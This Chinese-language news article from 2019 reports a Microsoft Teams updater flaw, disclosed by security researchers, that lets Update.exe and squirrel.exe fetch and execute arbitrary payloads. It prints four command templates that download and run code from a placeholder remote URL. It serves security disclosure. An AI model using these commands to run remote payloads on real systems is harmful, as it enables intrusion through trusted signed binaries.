0
| 本文作者: 李勤 | 2019-06-30 12:37 |
雷鋒網消息,據 BleepingComputer 美國時間 6 月 29 日報道,多位安全研究人員發現當前在Microsoft Teams桌面應用中實現的“update”升級機制允許黑客在系統上下載和執行任意文件,
研究人員表示,對易受攻擊的應用程序使用“update”命令可以在當前用戶的上下文中執行任意二進制文件。目前,研究人員已向微軟報告了這個問題。
使用Microsoft Teams,將有效負載添加到其文件夾中,并使用以下任一命令自動執行:
Update.exe --update [url to payload]
squirrel.exe --update [url to payload]
這些命令可以與其他參數一起使用,包括“download”,它允許從遠程位置以NuGet包的形式檢索有效負載。
Update.exe --download [url to payload]
squirrel.exe --download [url to payload]
相同的方法適用于“squirrel.exe”,它也是Microsoft Teams安裝包的一部分。這兩個可執行文件現在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)數據庫的一部分。
安全研究員 Reegun Richard 在 6 月 4 日向微軟團隊報告了這個問題。此時,應用程序仍然容易受到攻擊,因為微軟通知研究員該修復程序將在未來的軟件版本中出現。
來源:BleepingComputer 。
雷峰網版權文章,未經授權禁止轉載。詳情見轉載須知。